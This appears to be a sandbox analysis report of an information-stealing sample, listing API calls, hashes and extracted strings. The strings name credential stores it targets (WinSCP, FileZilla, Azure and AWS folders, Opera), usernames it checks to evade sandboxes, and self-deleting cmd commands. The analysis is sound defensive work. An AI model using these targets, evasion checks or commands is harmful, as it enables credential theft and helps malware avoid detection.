                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: aa3703d3437d06fb50dade6e7388276a3799fb2df3744491841b8284a36df350
                                                                • Instruction ID: 9d6a1cee47f635cf13ac9ce2c832d8e993c26a4a09d493c42fccfa592e4f4ed0
                                                                • Opcode Fuzzy Hash: aa3703d3437d06fb50dade6e7388276a3799fb2df3744491841b8284a36df350
                                                                • Instruction Fuzzy Hash: 109002A035E250578A0217716C1D50565946A48706B951561A001C4454DBA580409919
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                                • Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
                                                                • Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                                • Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                • Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
                                                                • Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                • Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                                • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                • Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
                                                                • Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                • Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950
                                                                APIs
                                                                • _memset.LIBCMT ref: 0040E1B7
                                                                • _memset.LIBCMT ref: 0040E1D7
                                                                • _memset.LIBCMT ref: 0040E1E8
                                                                • _memset.LIBCMT ref: 0040E1F9
                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
                                                                • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
                                                                • RegGetValueA.ADVAPI32(?,?,HostName,?,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
                                                                • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _memset$Value$Open
                                                                • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                • API String ID: 2191171593-2798830873
                                                                • Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                • Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
                                                                • Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                • Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5
                                                                APIs
                                                                  • Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0040DBBB
                                                                  • Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBCD
                                                                • HeapFree.KERNEL32(00000000), ref: 0040DD27
                                                                • strcpy_s.MSVCRT ref: 0040DD43
                                                                • HeapFree.KERNEL32(00000000), ref: 0040DD62
                                                                • HeapFree.KERNEL32(00000000), ref: 0040DD9A
                                                                • HeapFree.KERNEL32(00000000), ref: 0040DDC4
                                                                • strcpy_s.MSVCRT ref: 0040DDDA
                                                                • HeapFree.KERNEL32(00000000), ref: 0040DDF3
                                                                • HeapFree.KERNEL32(00000000), ref: 0040DE18
                                                                • HeapFree.KERNEL32(00000000), ref: 0040DE42
                                                                • strcpy_s.MSVCRT ref: 0040DE52
                                                                • HeapFree.KERNEL32(00000000), ref: 0040DE6B
                                                                • HeapFree.KERNEL32(00000000), ref: 0040DE9A
                                                                • HeapFree.KERNEL32(00000000), ref: 0040DECA
                                                                • strcpy_s.MSVCRT ref: 0040DEDD
                                                                • HeapFree.KERNEL32(00000000), ref: 0040DEF6
                                                                • lstrlenA.KERNEL32(00000000), ref: 0040DEFF
                                                                • lstrlenA.KERNEL32(00000000), ref: 0040DF34
                                                                  • Part of subcall function 0040F128: std::_Xinvalid_argument.LIBCPMT ref: 0040F13E
                                                                • strcpy_s.MSVCRT ref: 0040DF75
                                                                • HeapFree.KERNEL32(00000000), ref: 0040DFA8
                                                                • lstrlenA.KERNEL32(?), ref: 0040DFAD
                                                                • HeapFree.KERNEL32(00000000), ref: 0040DFDE
                                                                • strcpy_s.MSVCRT ref: 0040DFEC
                                                                • HeapFree.KERNEL32(00000000), ref: 0040E000
                                                                • HeapFree.KERNEL32(00000000), ref: 0040E03C
                                                                • strcpy_s.MSVCRT ref: 0040E065
                                                                • HeapFree.KERNEL32(00000000), ref: 0040E07E
                                                                • HeapFree.KERNEL32(00000000), ref: 0040E129
                                                                • HeapFree.KERNEL32(00000000), ref: 0040E17A
                                                                  • Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBF2
                                                                  • Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
                                                                  • Part of subcall function 0040DB7F: strcpy_s.MSVCRT ref: 0040DC6F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap$strcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
                                                                • String ID:
                                                                • API String ID: 219400098-0
                                                                • Opcode ID: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
                                                                • Instruction ID: 0a8d11442738e0aebf2a58bd4f58ea1ebce0464b8d6fd0751a66cb0fe0de1c79
                                                                • Opcode Fuzzy Hash: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
                                                                • Instruction Fuzzy Hash: F0E14C72C00219ABEF249FF1DC48ADEBF79BF08305F1454AAF115B3152EA3A59849F54
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00424B1F
                                                                • __mtterm.LIBCMT ref: 00424B2B
                                                                  • Part of subcall function 004247EA: DecodePointer.KERNEL32(FFFFFFFF), ref: 004247FB
                                                                  • Part of subcall function 004247EA: TlsFree.KERNEL32(FFFFFFFF), ref: 00424815
                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00424B41
                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00424B4E
                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00424B5B
                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00424B68
                                                                • TlsAlloc.KERNEL32 ref: 00424BB8
                                                                • TlsSetValue.KERNEL32(00000000), ref: 00424BD3
                                                                • __init_pointers.LIBCMT ref: 00424BDD
                                                                • EncodePointer.KERNEL32 ref: 00424BEE
                                                                • EncodePointer.KERNEL32 ref: 00424BFB
                                                                • EncodePointer.KERNEL32 ref: 00424C08
                                                                • EncodePointer.KERNEL32 ref: 00424C15
                                                                • DecodePointer.KERNEL32(Function_0002496E), ref: 00424C36
                                                                • __calloc_crt.LIBCMT ref: 00424C4B
                                                                • DecodePointer.KERNEL32(00000000), ref: 00424C65
                                                                • __initptd.LIBCMT ref: 00424C70
                                                                • GetCurrentThreadId.KERNEL32 ref: 00424C77
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                • API String ID: 3732613303-3819984048
                                                                • Opcode ID: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
                                                                • Instruction ID: 9e7d6304cc20a0816a56486267aa260185140d132a286571763312e702071250
                                                                • Opcode Fuzzy Hash: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
                                                                • Instruction Fuzzy Hash: F7312C35E053609ADB23AF7ABD0860A3BA4EF85722B51063BE410D32B1DBB9D440DF5D
                                                                APIs
                                                                • GetUserNameA.ADVAPI32(?,?), ref: 00401A13
                                                                • lstrcmpiA.KERNEL32(0043ABCC,?), ref: 00401A2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: NameUserlstrcmpi
                                                                • String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
                                                                • API String ID: 542268695-1784693376
                                                                • Opcode ID: a14623c780237b748c23d57be73366fad00cd6805492050cb9e0f9165e120a21
                                                                • Instruction ID: b7e7ac9f27e83d335140a50ac772a364dc2a7579303695bb9c42e1fce2a6af08
                                                                • Opcode Fuzzy Hash: a14623c780237b748c23d57be73366fad00cd6805492050cb9e0f9165e120a21
                                                                • Instruction Fuzzy Hash: B42103B094526C8BCB20CF159D4C6DDBBB5AB5D308F00B1DAD1886A210C7B85ED9CF4D
                                                                APIs
                                                                • lstrlenA.KERNEL32(00000000,74DE83C0,00000000,0041C55B,?), ref: 0041B875
                                                                • StrCmpCA.SHLWAPI(74DE83C0,0043613C), ref: 0041B8A3
                                                                • StrCmpCA.SHLWAPI(74DE83C0,.zip), ref: 0041B8B3
                                                                • StrCmpCA.SHLWAPI(74DE83C0,.zoo), ref: 0041B8BF
                                                                • StrCmpCA.SHLWAPI(74DE83C0,.arc), ref: 0041B8CB
                                                                • StrCmpCA.SHLWAPI(74DE83C0,.lzh), ref: 0041B8D7
                                                                • StrCmpCA.SHLWAPI(74DE83C0,.arj), ref: 0041B8E3
                                                                • StrCmpCA.SHLWAPI(74DE83C0,.gz), ref: 0041B8EF
                                                                • StrCmpCA.SHLWAPI(74DE83C0,.tgz), ref: 0041B8FB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                • API String ID: 1659193697-51310709
                                                                • Opcode ID: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
                                                                • Instruction ID: 4d0ab467417de3272ea9e1328912bf8f077e80ad604b43416a02b9711c478325
                                                                • Opcode Fuzzy Hash: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
                                                                • Instruction Fuzzy Hash: 41015239A89227B56A223631AD81FBF1E5C8D86F807151037E845A2188DB5C998355FD
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _memset
                                                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                • API String ID: 2102423945-974132213
                                                                • Opcode ID: 55a8d500616c789d0e657dfe8fa0d9e64425d0658c5e4b9ff82fff88e05ca36e
                                                                • Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
                                                                • Opcode Fuzzy Hash: 55a8d500616c789d0e657dfe8fa0d9e64425d0658c5e4b9ff82fff88e05ca36e
                                                                • Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _memset$strtok_s$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                • API String ID: 2378718607-332874205
                                                                • Opcode ID: 7048d79631d77e3b69450ef63e4f860a89950651d43e4fedf806bfe48cd23ff3
                                                                • Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
                                                                • Opcode Fuzzy Hash: 7048d79631d77e3b69450ef63e4f860a89950651d43e4fedf806bfe48cd23ff3
                                                                • Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55
                                                                APIs
                                                                  • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                • strtok_s.MSVCRT ref: 0040E77E
                                                                  • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                  • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocCreateLocalObjectSingleThreadWaitstrtok_s
                                                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                • API String ID: 216677008-935134978
                                                                • Opcode ID: 9d14ff962cbfa92ac596727b9be21d1dd0c5f20fa87d44550d8f4e7319faeed8
                                                                • Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
                                                                • Opcode Fuzzy Hash: 9d14ff962cbfa92ac596727b9be21d1dd0c5f20fa87d44550d8f4e7319faeed8
                                                                • Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                • String ID:
                                                                • API String ID: 3833677464-0
                                                                • Opcode ID: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
                                                                • Instruction ID: 316f7d86b509052675ed64499f597221969422cd52b172cd7ffbd25416df4cfd
                                                                • Opcode Fuzzy Hash: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
                                                                • Instruction Fuzzy Hash: 392126B1705621BADB217F26F802D4FBBE0DF91758BA0842FF48446261DF39A840C65D
                                                                APIs
                                                                  • Part of subcall function 004015BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 004015C6
                                                                  • Part of subcall function 004015BC: HeapAlloc.KERNEL32(00000000), ref: 004015CD
                                                                • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00401606
                                                                • GetLastError.KERNEL32 ref: 0040160C
                                                                • SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00401614
                                                                • GetWindowContextHelpId.USER32(00000000), ref: 0040161B
                                                                • GetWindowLongW.USER32(00000000,00000000), ref: 00401623
                                                                • RegisterClassW.USER32(00000000), ref: 0040162A
                                                                • IsWindowVisible.USER32(00000000), ref: 00401631
                                                                • ConvertDefaultLocale.KERNEL32(00000000), ref: 00401638
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401644
                                                                • IsDialogMessageW.USER32(00000000,00000000), ref: 0040164C
                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00401656
                                                                • HeapFree.KERNEL32(00000000), ref: 0040165D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
                                                                • String ID:
                                                                • API String ID: 3627164727-0
                                                                • Opcode ID: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
                                                                • Instruction ID: 597bc7deab9f95c5419af2560a3a18d661806b2e942c9da5f2f727d66e905f75
                                                                • Opcode Fuzzy Hash: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
                                                                • Instruction Fuzzy Hash: 17014672402824FBC7156BA1BD6DDDF3E7CEE4A3527141265F60A910608B794A01CBFE
                                                                APIs
                                                                • _free.LIBCMT ref: 00426634
                                                                • _free.LIBCMT ref: 00426642
                                                                • _free.LIBCMT ref: 0042664D
                                                                • _free.LIBCMT ref: 00426621
                                                                  • Part of subcall function 0041D93B: HeapFree.KERNEL32(00000000,00000000,?,0041D18F,00000000,0043B6F4,0041D1D6,0040EEBE,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4), ref: 0041D951
                                                                  • Part of subcall function 0041D93B: GetLastError.KERNEL32(?,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4,?,?,?), ref: 0041D963
                                                                • ___free_lc_time.LIBCMT ref: 0042666B
                                                                • _free.LIBCMT ref: 00426676
                                                                • _free.LIBCMT ref: 0042669B
                                                                • _free.LIBCMT ref: 004266B2
                                                                • _free.LIBCMT ref: 004266C1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lc_time
                                                                • String ID: xLC
                                                                • API String ID: 3704779436-381350105
                                                                • Opcode ID: 330362af81a2d29c8bc6dd115f1b5d8232e71c49360d0d8446d85f6bf0e0d0e7
                                                                • Instruction ID: fdfe39178027f3e5e6c57af64549801535ecf2e9aa55874642047572a4db4e51
                                                                • Opcode Fuzzy Hash: 330362af81a2d29c8bc6dd115f1b5d8232e71c49360d0d8446d85f6bf0e0d0e7
                                                                • Instruction Fuzzy Hash: 421194F2A10311ABDF206F76E985B9BB3A5EB01308F95093FE14897251CB3C9C91CA1C
                                                                APIs
                                                                • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041B9C5
                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0041BA3E
                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041BA5A
                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041BA6E
                                                                • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041BA77
                                                                • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BA87
                                                                • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041BAA5
                                                                • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BAB5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$PointerRead$HandleInformationSize
                                                                • String ID:
                                                                • API String ID: 2979504256-3916222277
                                                                • Opcode ID: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
                                                                • Instruction ID: 2f96ef8e8c352da0c6fd23b8bc0b50d76e073618b9a0ce70252d9e73764e8c17
                                                                • Opcode Fuzzy Hash: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
                                                                • Instruction Fuzzy Hash: 4A51F3B1D0021CAFDB28DF99DC85AEEBBB9EF04344F10442AE511E6260D7789D85CF94
                                                                APIs
                                                                Strings
                                                                • " & exit, xrefs: 004183DA
                                                                • /c timeout /t 10 & del /f /q ", xrefs: 004182E5
                                                                • " & rd /s /q "C:\ProgramData\, xrefs: 00418333
                                                                • " & exit, xrefs: 00418389
                                                                • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _memset
                                                                • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                • API String ID: 2102423945-1079830800
                                                                • Opcode ID: d46c157a4d5234649ccbc3398d9aa7e4c0f9eceea218cecf25975c6506891a1a
                                                                • Instruction ID: 1ae59a344acfb3974a61857d13031c8d3ca99e2a3e4d1f1889283d5f7c2ecc01
                                                                • Opcode Fuzzy Hash: d46c157a4d5234649ccbc3398d9aa7e4c0f9eceea218cecf25975c6506891a1a
                                                                • Instruction Fuzzy Hash: 7551BDB1E402299BCF21EF25DD456DDB3BCAB44708F4104EAA718B3151DB786FC68E58
                                                                APIs
                                                                • UnDecorator::getArgumentList.LIBCMT ref: 0041F969
                                                                  • Part of subcall function 0041F504: Replicator::operator[].LIBCMT ref: 0041F587
                                                                  • Part of subcall function 0041F504: DName::operator+=.LIBCMT ref: 0041F58F
                                                                • DName::operator+.LIBCMT ref: 0041F9C2
                                                                • DName::DName.LIBCMT ref: 0041FA1A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                • API String ID: 834187326-2211150622
                                                                • Opcode ID: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
                                                                • Instruction ID: a738addbbfcb5581dbeaf62b254c3fbf004fdb1dbbbb6a7a041229699445b56b
                                                                • Opcode Fuzzy Hash: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
                                                                • Instruction Fuzzy Hash: 3D217471611249AFCB21DF1CD444AA97BB4EF0534AB14806AE845CB367E738D987CB48
                                                                APIs
                                                                • UnDecorator::UScore.LIBCMT ref: 004212E7
                                                                • DName::DName.LIBCMT ref: 004212F3
                                                                  • Part of subcall function 0041EFBE: DName::doPchar.LIBCMT ref: 0041EFEF
                                                                • UnDecorator::getScopedName.LIBCMT ref: 00421332
                                                                • DName::operator+=.LIBCMT ref: 0042133C
                                                                • DName::operator+=.LIBCMT ref: 0042134B
                                                                • DName::operator+=.LIBCMT ref: 00421357
                                                                • DName::operator+=.LIBCMT ref: 00421364
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                • String ID: void
                                                                • API String ID: 1480779885-3531332078
                                                                • Opcode ID: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
                                                                • Instruction ID: c2652f7c91e1ef5edc9e2e1e9b8a32b02dad70e76bfe1aa60437c31099f645d5
                                                                • Opcode Fuzzy Hash: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
                                                                • Instruction Fuzzy Hash: 75112C75600218BFD704EF68D855BEE7F64AF10309F44009FE416972E2DB38DA85C748
                                                                APIs
                                                                • StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
                                                                • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
                                                                • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
